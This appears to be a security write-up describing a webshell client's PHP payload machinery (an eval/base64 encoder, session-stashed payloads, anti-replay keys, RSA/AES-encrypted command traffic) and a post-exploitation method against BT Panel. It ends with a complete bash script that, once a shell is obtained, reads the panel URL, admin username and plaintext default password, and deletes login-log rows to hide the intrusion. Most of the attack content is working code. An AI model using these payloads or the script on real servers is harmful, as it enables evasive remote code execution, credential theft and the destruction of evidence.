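For reference, one way to reproduce chunked sending with requests is to pass a generator as the body (requests switches to Transfer-Encoding: chunked when the body length is unknown); this sketch is mine, not the project's code, and the URL and body are placeholders:

# send a POST body in chunks with a delay between them
import time

import requests

def chunks(body: bytes, size: int = 16, delay: float = 0.1):
    for i in range(0, len(body), size):
        time.sleep(delay)
        yield body[i:i + size]

requests.post("http://target/shell.php", data=chunks(b"code=phpinfo();"))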

AntSword (蚁剑) encoder

notejs_eval, invoked via eval_antsword_encoder, rewrites the data parameter.

While the JS runs, it generates a random parameter name, randomID, in data, assigns the base64-encoded payload to data[randomID], and then sets the supplied pwd parameter to eval(base64_decode($_POST[${randomID}]));.
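
In Python terms, what that JS does is roughly the following (my rendering of the behavior described above, not the upstream encoder source):

# build an AntSword-style request body: the real code travels base64-encoded
# under a random parameter name, and the connection-password parameter is set
# to a stub that decodes and evals it
import base64
import random

def antsword_b64_body(pwd: str, php_code: str) -> dict:
    random_id = '_0x' + ''.join(random.choices('0123456789abcdef', k=6))
    return {
        random_id: base64.b64encode(php_code.encode()).decode(),
        pwd: f"eval(base64_decode($_POST[{random_id}]));",
    }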

Stashing the payload in the session

The payload is restructured by to_sessionize_payload.

<?php
session_start();
function decoder_echo_raw($s)
{
    echo $s;
}
$eg_decoder_hooks = array();
function decoder_echo($s)
{
    global $eg_decoder_hooks;
    for ($i = 0; $i < count($eg_decoder_hooks); $i++) {
        $f = $eg_decoder_hooks[$i];
        $s = $f($s);
    }
    echo decoder_echo_raw($s);
}
echo 'yiu' . 'ems';
try {
    $b64_part = 'ZGVjb2Rlcl9lY2hvKCdncnJ1ZnonIC4gJ2h1Z2x0aicpOw==';
    if (!$_SESSION['_42541744-52b7-438d-8704-536c41405598']) {
        $_SESSION['_42541744-52b7-438d-8704-536c41405598'] = array();
    }
    $_SESSION['_42541744-52b7-438d-8704-536c41405598'][0] = $b64_part;
} catch (Exception $e) {
    die("POSTEXEC_F" . "AILED");
}
echo 'yfxmvw';

The session stores a base64-encoded piece of code, which decodes to:

decoder_echo('grrufz' . 'hugltj');

HTTP anti-replay

A payload built from the ANTIREPLAY_GENKEY_PHP template is sent to the target host through the submitter, and a key is obtained.

ANTIREPLAY_GENKEY_PHP = compress_phpcode_template(
    """
    decoder_echo(($_SESSION['SESSION_NAME']=rand()%10000).'');
    """
)
<?php
session_start();
function decoder_echo_raw($s)
{
    echo $s;
}
$eg_decoder_hooks = array();
function decoder_echo($s)
{
    global $eg_decoder_hooks;
    for ($i = 0; $i < count($eg_decoder_hooks); $i++) {
        $f = $eg_decoder_hooks[$i];
        $s = $f($s);
    }
    echo decoder_echo_raw($s);
}
echo 'tnm' . 'ljq';
try {
    decoder_echo(($_SESSION['replay_key_8b0c50f8-564e-4313-b6a8-97731b4a9e06'] = rand() % 10000) . '');
} catch (Exception $e) {
    die("POSTEXEC_F" . "AILED");
}
echo 'tfffso';

After receiving the key, the payload is modified again: the key value is embedded, and on a match the base64-decoded content of the PAYLOAD_B64 parameter is executed.

ANTIREPLAY_VERIFY_PHP = compress_phpcode_template(
    """
    if(!isset($_SESSION[SESSION_NAME])){
        decoder_echo("WRONG_NO_SESSION");
    }else if(KEY == $_SESSION[SESSION_NAME]) {
        eval(base64_decode(PAYLOAD_B64));
        unset($_SESSION[SESSION_NAME]);
    }else{
        decoder_echo("WRONG_BAD_KEY");
    }
    """
)
<?php
session_start();
function decoder_echo_raw($s)
{
    echo $s;
}
$eg_decoder_hooks = array();
function decoder_echo($s)
{
    global $eg_decoder_hooks;
    for ($i = 0; $i < count($eg_decoder_hooks); $i++) {
        $f = $eg_decoder_hooks[$i];
        $s = $f($s);
    }
    echo decoder_echo_raw($s);
}
echo 'dzd' . 'qpo';
try {
    if (!isset($_SESSION['replay_key_8b0c50f8-564e-4313-b6a8-97731b4a9e06'])) {
        decoder_echo("WRONG_NO_SESSION");
    } else if (9743 == $_SESSION['replay_key_8b0c50f8-564e-4313-b6a8-97731b4a9e06']) {
        eval(base64_decode('ZGVjb2Rlcl9lY2hvKCdwcWFhcXonIC4gJ2h0ZmlraycpOw=='));
        unset($_SESSION['replay_key_8b0c50f8-564e-4313-b6a8-97731b4a9e06']);
    } else {
        decoder_echo("WRONG_BAD_9743");
    }
} catch (Exception $e) {
    die("POSTEXEC_F" . "AILED");
}
echo 'mgsoyb';

Traffic encryption

The client first sends its RSA public key to the server; the server runs PHP code to generate an AES key and returns that key to the client encrypted with RSA.

All subsequent traffic is then transported AES-encrypted.

get_rsa_key generates the RSA public and private keys.

get_aes_key builds a payload from the ENCRYPTION_SENDKEY_PHP code template and sends it through the submitter; if valid data comes back, the AES key is read by decrypting it with RSA.

ENCRYPTION_SENDKEY_PHP = compress_phpcode_template(
    """
    if(!extension_loaded('openssl')){
        decoder_echo("WRONG_NO_OPENSSL");
    }else if(!function_exists("openssl_public_encrypt")){
        decoder_echo("WRONG_NO_OPENSSL_FUNCTION");
    }else{
        $_SESSION[{session_name}] = openssl_random_pseudo_bytes(32);
        openssl_public_encrypt(
            $_SESSION[{session_name}],
            $encrypted,
            base64_decode({pubkey_b64}),
            OPENSSL_PKCS1_OAEP_PADDING
        );
        decoder_echo(base64_encode($encrypted));
    }
    """
)
<?php
session_start();
function decoder_echo_raw($s)
{
    echo $s;
}
$eg_decoder_hooks = array();
function decoder_echo($s)
{
    global $eg_decoder_hooks;
    for ($i = 0; $i < count($eg_decoder_hooks); $i++) {
        $f = $eg_decoder_hooks[$i];
        $s = $f($s);
    }
    echo decoder_echo_raw($s);
}
echo 'qfy' . 'ebe';
try {
    if (!extension_loaded('openssl')) {
        decoder_echo("WRONG_NO_OPENSSL");
    } else if (!function_exists("openssl_public_encrypt")) {
        decoder_echo("WRONG_NO_OPENSSL_FUNCTION");
    } else {
        $_SESSION['_566d3bb0-51e1-4077-94c2-dc4d8e4294e5'] = openssl_random_pseudo_bytes(32);
        openssl_public_encrypt($_SESSION['_566d3bb0-51e1-4077-94c2-dc4d8e4294e5'], $encrypted, base64_decode('LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUFzS0ZnMk5iUHpoblRYQ2c2R0kwMgoxZklhWUsvRDV4cHVzQTlJbEI4NUt5ZUhiTVVxaXNjTFQ1UDRudVE2dU9qWjY2WEljKzlGd1lrUXJjaVhDS25BCkNpV3lZUFZnNFFvWGtFNkJJbGlKZWhaRU0xeVhTdGQ0UitLZzRiWlFGWXpQR0tpWm5KK3NtYUNiRmU3dnZsd24KVUFLU2ZCUkVtb1lyekFzd2oreGV6blFXL04yOVQ4bXpYUGdjbFV2UG9MMllydzdSeDlvbUtyZU8ydUNRUnpoawo2RG5PWElhb0NUUURxbU5PaXdlb0Faa0hCR0VVbHJxaFdMd3AweEx2ajBsRUliRGpId295cFJkejhlclRzMnlZClhESmF5ZXJCNUdXTmZqdEJEYzJBMHRkeXBHaFBIeGFaelF5VEUwTTIvbHdZR0txU29LaXNuTnNWM1VCQmw2Q1UKQ1FJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0t'), OPENSSL_PKCS1_OAEP_PADDING);
        decoder_echo(base64_encode($encrypted));
    }
} catch (Exception $e) {
    die("POSTEXEC_F" . "AILED");
}
echo 'rqrrrp';

After the echoed key is received, the payload is encrypted with encrypt_aes256_cbc, the final payload is generated from the ENCRYPTION_COMMUNICATE_PHP template, and it is sent to the server.
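
A hedged Python counterpart of that wire format (base64 of the IV concatenated with the raw AES-256-CBC ciphertext, PKCS7 padding), matching the PHP aes_enc/aes_dec below; it uses pycryptodome and is my sketch, not the project's encrypt_aes256_cbc:

# encrypt/decrypt in the format base64( iv || raw AES-256-CBC ciphertext )
import base64
import os

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad

def encrypt_aes256_cbc(key: bytes, data: bytes) -> str:
    iv = os.urandom(16)
    ct = AES.new(key, AES.MODE_CBC, iv).encrypt(pad(data, 16))
    return base64.b64encode(iv + ct).decode()

def decrypt_aes256_cbc(key: bytes, blob: str) -> bytes:
    raw = base64.b64decode(blob)
    return unpad(AES.new(key, AES.MODE_CBC, raw[:16]).decrypt(raw[16:]), 16)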

ENCRYPTION_COMMUNICATE_PHP = compress_phpcode_template(
    """
    function aes_enc($data) {
        $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('AES-256-CBC'));
        $encryptedData = openssl_encrypt(
            $data,
            'AES-256-CBC',
            $_SESSION[{session_name}],
            0,
            $iv
        );
        return base64_encode($iv . base64_decode($encryptedData));
    }

    function aes_dec($encryptedData) {
        $data = base64_decode($encryptedData);
        return openssl_decrypt(
            base64_encode(substr($data, 16)),
            'AES-256-CBC',
            $_SESSION[{session_name}],
            0,
            substr($data, 0, 16)
        );
    }
    if(!isset($_SESSION[{session_name}])){
        decoder_echo("WRONG_NO_SESSION");
    }else if(extension_loaded('openssl')) {
        array_push($eg_decoder_hooks, "aes_enc");
        $code = aes_dec({code_enc});
        eval($code);
    }else{
        decoder_echo("WRONG_NO_OPENSSL");
    }
    """
)
<?php
session_start();
function decoder_echo_raw($s)
{
    echo $s;
}
$eg_decoder_hooks = array();
function decoder_echo($s)
{
    global $eg_decoder_hooks;
    for ($i = 0; $i < count($eg_decoder_hooks); $i++) {
        $f = $eg_decoder_hooks[$i];
        $s = $f($s);
    }
    echo decoder_echo_raw($s);
}
echo 'yiw' . 'nun';
try {
    function aes_enc($data)
    {
        $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('AES-256-CBC'));
        $encryptedData = openssl_encrypt($data, 'AES-256-CBC', $_SESSION['_609cc29a-28e5-4de7-8c56-ccfcf1cc48a1'], 0, $iv);
        return base64_encode($iv . base64_decode($encryptedData));
    }
    function aes_dec($encryptedData)
    {
        $data = base64_decode($encryptedData);
        return openssl_decrypt(base64_encode(substr($data, 16)), 'AES-256-CBC', $_SESSION['_609cc29a-28e5-4de7-8c56-ccfcf1cc48a1'], 0, substr($data, 0, 16));
    }
    if (!isset($_SESSION['_609cc29a-28e5-4de7-8c56-ccfcf1cc48a1'])) {
        decoder_echo("WRONG_NO_SESSION");
    } else if (extension_loaded('openssl')) {
        array_push($eg_decoder_hooks, "aes_enc");
        $code = aes_dec('YPE+ioDoxcvCjgdpLho7/cJtmXRSXq9VKmfDybcmhwAkvmuCukxqWMV0GVv+1scfIMmuj6aX6Dlq9Tk9On0VJ8Q7md5QAIGmmrPlAMRg1mNuQta7+paSwSelVJPNsA4h');
        eval($code);
    } else {
        decoder_echo("WRONG_NO_OPENSSL");
    }
} catch (Exception $e) {
    die("POSTEXEC_F" . "AILED");
}
echo 'dgydmh';

BT Panel (宝塔面板)

Basic information

If you find that a site was set up with BT Panel and you have obtained a shell on it, but you only have www privileges and disable_functions blocks the command-execution functions, you can try to recover the panel's login URL, default account and default password and log in to the panel itself.

Windows version 7.9.0

I set up BT Panel (Windows version 7.9.0) on Windows 10; its login path, default account and default password are visible below.

However, these are stored in plaintext in files under the /BtSoft/panel/data/ directory.

The login port is in the port.pl file.

The login path is in the admin_path.pl file.

The default account is in a file under the session folder.

The default password is in the default.pl file.

In later versions, default.pl is updated so that it only holds asterisks/garbage.

In the panel source, the login logic in userlogin.py shows that default.pl gets overwritten after a successful login.

The Linux version changed this logic in 7.9.5.

On Windows 8.2.0 the default password is still in default.pl (Linux 7.7.0 behaves the same; Linux 7.9.5 changed the code logic so that default.pl is overwritten after a successful login).

Login log

Both successful and failed logins are recorded.

The log is stored in /www/server/panel/data/default.db.
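
For a quick manual look at that table (path as in the screenshots):

# print the last 10 login-log rows from the panel database
import sqlite3

con = sqlite3.connect("/www/server/panel/data/default.db")
for row in con.execute("SELECT * FROM logs ORDER BY id DESC LIMIT 10"):
    print(row)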

Script

Reads the panel URL, retrieves the username and password, and clears the log.

Linux

#!/bin/bash
# file paths
port_file="/www/server/panel/data/port.pl"
admin_path_file="/www/server/panel/data/admin_path.pl"
password_file="/www/server/panel/default.pl"
root_dir="/www/server/panel/"

local_ip=$(hostname -I | awk '{print $1}')
if [[ -f "$port_file" ]]; then
    panel_port=$(cat "$port_file")
else
    echo "File $port_file does not exist; cannot read the port."
    exit 1
fi
if [[ -f "$admin_path_file" ]]; then
    admin_path=$(cat "$admin_path_file")
else
    echo "File $admin_path_file does not exist; cannot read the login path."
    exit 1
fi

# print the panel URL
if [[ -n "$local_ip" && -n "$panel_port" && -n "$admin_path" ]]; then
    echo "---------------------------------------"
    echo "Panel URL:"
    echo "$local_ip:$panel_port$admin_path"
    echo "---------------------------------------"
else
    echo "Could not build the panel URL; check the config files."
fi

# print the username
if [[ -d "$root_dir" ]]; then
    db_files=$(find "$root_dir" -type f -name "default.db")
    if [[ -n "$db_files" ]]; then
        while IFS= read -r db_file; do
            table_check=$(sqlite3 "$db_file" "SELECT name FROM sqlite_master WHERE type='table' AND name='users';")
            if [[ -n "$table_check" ]]; then
                echo "---------------------------------------"
                sqlite3 "$db_file" "SELECT username FROM users;" | while read -r username; do
                    echo "username: $username"
                done
            else
                echo "Table 'users' does not exist."
            fi
        done <<< "$db_files"
    else
        echo "No default.db file found."
    fi
else
    echo "Directory $root_dir does not exist."
fi

# check the password file
if [[ -f "$password_file" ]]; then
    pwd=$(cat "$password_file") # read the password
    echo "password: $pwd"
    echo "---------------------------------------"
else
    echo "File $password_file does not exist."
fi

# show the logs table and offer to delete entries
echo "---------------------------------------"
echo "Query the logs table and delete entries:"
if [[ -d "$root_dir" ]]; then
    db_files=$(find "$root_dir" -type f -name "default.db")
    if [[ -n "$db_files" ]]; then
        # show the log data
        for db_file in $db_files; do
            table_check=$(sqlite3 "$db_file" "SELECT name FROM sqlite_master WHERE type='table' AND name='logs';")
            if [[ -n "$table_check" ]]; then
                echo "Log count:"
                log_count=$(sqlite3 "$db_file" "SELECT COUNT(*) FROM logs;")
                echo "The logs table currently holds $log_count rows."
                if [[ "$log_count" -gt 0 ]]; then
                    # show the last 10 rows of the logs table
                    echo "---------------------------------------"
                    echo "Last 10 rows of the logs table:"
                    sqlite3 "$db_file" "SELECT * FROM logs ORDER BY id DESC LIMIT 10;"
                    echo "---------------------------------------"
                else
                    echo "The logs table is empty."
                fi
            else
                echo "Table 'logs' does not exist."
            fi
        done
        # ask how many log rows to delete
        echo "Enter the number of log rows to delete (deleted from the highest ID down; enter 0 to cancel):"
        read -r delete_count
        # debug output: show what the user entered
        echo "Rows to delete: $delete_count"
        # handle the user input
        if [[ -n "$delete_count" && "$delete_count" =~ ^[0-9]+$ ]] && [[ "$delete_count" -gt 0 ]]; then
            for db_file in $db_files; do
                # collect the IDs to delete (highest first)
                ids_to_delete=$(sqlite3 "$db_file" "SELECT id FROM logs ORDER BY id DESC LIMIT $delete_count;")
                # delete those rows from the logs table
                for id in $ids_to_delete; do
                    sqlite3 "$db_file" "DELETE FROM logs WHERE id = $id;"
                done
                # get the highest remaining ID
                last_id=$(sqlite3 "$db_file" "SELECT MAX(id) FROM logs;")
                # if last_id is empty the table is empty; reset to 1
                if [[ -z "$last_id" ]]; then
                    last_id=1
                fi
                # update sqlite_sequence so the logs auto-increment ID stays consistent
                sqlite3 "$db_file" "UPDATE sqlite_sequence SET seq = $last_id WHERE name = 'logs';"
                echo "Deleted the log rows and updated sqlite_sequence."
            done
        else
            echo "Invalid input or count out of range; deletion cancelled. Enter a number between 1 and $log_count."
        fi
    else
        echo "No default.db file found."
    fi
else
    echo "Directory $root_dir does not exist."
fi
echo "---------------------------------------"